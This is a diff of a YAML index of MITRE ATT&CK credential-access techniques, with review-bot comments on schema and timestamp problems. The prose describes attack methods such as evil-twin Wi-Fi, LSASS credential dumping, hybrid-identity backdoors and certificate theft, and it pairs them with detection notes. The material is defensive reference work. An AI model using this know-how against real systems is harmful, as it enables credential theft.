+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- identifier: T1552
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
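Review bot: the `- identifier: T1552` line removed just before `atomic_tests: []` has no matching `+` line in this hunk, whereas sibling objects such as T1555.003 and T1552.004 keep their `identifier` key after `x_mitre_modified_by_ref`; unless the key was re-emitted higher in the object, anything that resolves techniques by `identifier` will no longer find T1552. Suggest re-adding `identifier: T1552` before `atomic_tests: []`, or documenting that the key is now optional. The `Azure AD` to `Entra ID` rename in the description correctly leaves the `(Citation: ...)` keys and the `AzureADConnectAuthenticationAgentService` service name untouched.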
@@ -45079,9 +45849,9 @@ credential-access:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -45090,21 +45860,22 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
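Review bot: the platform list for T1556.007 drops `Azure AD`, `Google Workspace` and `Office 365` in favour of `Office Suite` and `Identity Provider`, so any filter or per-platform index keyed on the old names will silently match nothing for this technique; every consumer that enumerates platforms should be updated in the same commit and the rename called out in the changelog. The rest of the hunk is key reordering (`x_mitre_deprecated`, `x_mitre_domains` and `x_mitre_contributors` move above `x_mitre_platforms`); emitting keys in a fixed order in the generator would keep future diffs limited to real changes.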
@@ -45144,55 +45915,10 @@ credential-access:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
- - RedHuntLabs, @redhuntlabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- created: '2020-02-12T18:57:36.041Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1555.003
- url: https://attack.mitre.org/techniques/T1555/003
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Microsoft CryptUnprotectData April 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
- description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
- June 18, 2019.
- - source_name: Proofpoint Vega Credential Stealer May 2018
- url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
- description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
- in targeted campaign . Retrieved June 18, 2019.
- - source_name: FireEye HawkEye Malware July 2017
- url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
- description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
- Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
- 2019.
- - source_name: GitHub Mimikittenz July 2016
- url: https://github.com/putterpanda/mimikittenz
- description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
- Retrieved June 20, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-15T14:13:45.294Z'
name: 'Credentials from Password Stores: Credentials from Web Browsers'
description: "Adversaries may acquire credentials from web browsers by reading
files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -45222,6 +45948,12 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Identify web browser files that contain credentials such
as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User
Data\Default\Login Data
. Monitor file read events of web browser files
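Review bot: the unchanged `x_mitre_detection` context shows the Chrome path broken across lines with a stray space before the period (`Data\Default\Login Data` followed by ` . Monitor file read events`), which looks like inline markup was stripped upstream when the text was converted; since this regeneration already rewrites the whole T1555.003 object, it is a good moment to normalise that string onto one line so the path can be copied into a detection rule as-is. The added `x_mitre_contributors` and `x_mitre_deprecated: false` lines follow the key order used elsewhere in the file.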
@@ -45231,23 +45963,58 @@ credential-access:
reading web browser process memory, utilizing regular expressions, and those
that contain numerous keywords for common web applications (Gmail, Twitter,
Office365, etc.).'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Access'
- 'File: File Access'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ created: '2020-02-12T18:57:36.041Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/003
+ external_id: T1555.003
+ - source_name: GitHub Mimikittenz July 2016
+ description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+ Retrieved June 20, 2019.
+ url: https://github.com/putterpanda/mimikittenz
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Microsoft CryptUnprotectData April 2018
+ description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+ June 18, 2019.
+ url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+ - source_name: Proofpoint Vega Credential Stealer May 2018
+ description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+ in targeted campaign . Retrieved June 18, 2019.
+ url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+ - source_name: FireEye HawkEye Malware July 2017
+ description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+ Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+ 2019.
+ url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1555.003
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
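Review bot: the `external_references` block for T1555.003 is deleted in the previous hunk and re-added here in a different order (`GitHub Mimikittenz July 2016` now precedes `Talos Olympic Destroyer 2018`, and `url` moves to the end of each entry), so most of these lines are ordering noise; the substantive changes are `revoked: false`, `x_mitre_version: '1.2'`, `x_mitre_attack_spec_version: 3.2.0`, and the removal of `x_mitre_permissions_required` and `spec_version`. Suggest having the generator sort references deterministically (keeping `mitre-attack` first) and emit keys in a stable order so the real changes are visible at a glance.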
@@ -45284,23 +46051,23 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -45333,21 +46100,20 @@ credential-access:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.004:
technique:
- modified: '2023-04-12T23:52:08.194Z'
+ modified: '2024-10-04T11:31:56.622Z'
name: 'Unsecured Credentials: Private Keys'
description: "Adversaries may search for private key certificate files on compromised
systems for insecurely stored credentials. Private cryptographic keys and
@@ -45358,7 +46124,7 @@ credential-access:
as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions
relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
- Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+ Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
device key and a transport key are generated and used to verify the device’s
identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45392,7 +46158,7 @@ credential-access:
- macOS
- Windows
- Network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
@@ -45420,7 +46186,7 @@ credential-access:
- source_name: Kaspersky Careto
description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
Masked APT. Retrieved July 5, 2017.
- url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+ url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
- source_name: Microsoft Primary Refresh Token
description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
Retrieved February 21, 2023.
@@ -45431,14 +46197,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Public-key_cryptography
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.004
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
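Review bot: `modified` for T1557.001 moves backwards, from `'2023-04-25T14:00:00.188Z'` to `'2022-10-25T15:46:55.393Z'`, while every other `modified` change above it in this diff moves forward; that suggests this object was regenerated from an older STIX bundle than the previous run used, and the `x_mitre_attack_spec_version: 3.0.0` left unchanged in the next hunk is consistent with a stale object. Please confirm the source bundle for T1557.001 before merging, since a regressed timestamp makes change tracking against ATT&CK releases unreliable.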
@@ -45546,12 +46311,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1003.001:
technique:
- modified: '2023-12-27T17:57:20.003Z'
+ modified: '2024-08-13T13:52:45.379Z'
name: 'OS Credential Dumping: LSASS Memory'
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45588,6 +46352,7 @@ credential-access:
- Edward Millington
- Ed Williams, Trustwave, SpiderLabs
- Olaf Hartong, Falcon Force
+ - Michael Forret, Quorum Cyber
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45600,7 +46365,7 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Access'
- 'Windows Registry: Windows Registry Key Modification'
@@ -45650,12 +46415,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.001
atomic_tests: []
T1110.003:
technique:
- modified: '2024-03-07T14:33:34.201Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Spraying'
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -45681,6 +46445,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- John Strand
@@ -45696,18 +46461,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -45734,14 +46499,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.003
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -45752,13 +46514,13 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -45772,6 +46534,7 @@ credential-access:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -45782,12 +46545,12 @@ credential-access:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1003.005:
technique:
- modified: '2024-04-18T23:47:54.553Z'
+ modified: '2024-10-15T14:18:59.123Z'
name: 'OS Credential Dumping: Cached Domain Credentials'
description: "Adversaries may attempt to access cached domain credentials used
to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -45862,7 +46625,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.005
atomic_tests: []
T1558.001:
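Review bot: this hunk only removes `spec_version: '2.1'` from T1003.005, and the same deletion is repeated for every technique in the diff; `spec_version` is a required property on STIX 2.1 domain objects, so if these dictionaries are ever fed back to a STIX 2.1 parser or validator they will now be rejected. If the field is dropped deliberately because the index is not meant to round-trip as STIX, the commit message should say so; otherwise keep `spec_version` alongside `x_mitre_attack_spec_version`.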
@@ -45908,7 +46670,7 @@ credential-access:
url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
Retrieved February 27, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-05T16:07:03.779Z'
name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
description: "Adversaries who have the KRBTGT account password hash may forge
Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
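Review bot: `modified` for T1558.001 regresses from `'2022-04-25T14:00:00.188Z'` to `'2020-11-05T16:07:03.779Z'`, almost two years earlier than the value it replaces, which is a second sign (after T1557.001 above) that some objects were pulled from a stale bundle. Worth checking whether the generator falls back to a cached or older STIX file when a technique is missing from the newer one, and adding a check that flags any `modified` value older than the one already in the index.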
@@ -45943,16 +46705,14 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.001
atomic_tests: []
T1649:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal or Forge Authentication Certificates
description: |-
- Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+ Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
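Review bot: for T1558.001 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed and nothing replaces them, while the other techniques in this diff gain `x_mitre_attack_spec_version: 3.2.0`; the object also keeps `x_mitre_permissions_required:` / `- User`, a key that T1555.003, T1552.003 and T1552.006 drop in this same change. The result is one technique with no attack spec version at all and an outdated key set, so either regenerate T1558.001 from the current bundle or add the 3.2.0 version line explicitly.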
@@ -45962,21 +46722,23 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Tristan Bennett, Seamless Intelligence
+ - Lee Christensen, SpecterOps
+ - Thirumalai Natarajan, Mandiant
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- - Azure AD
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Tristan Bennett, Seamless Intelligence
- - Lee Christensen, SpecterOps
- - Thirumalai Natarajan, Mandiant
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -46025,33 +46787,11 @@ credential-access:
url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
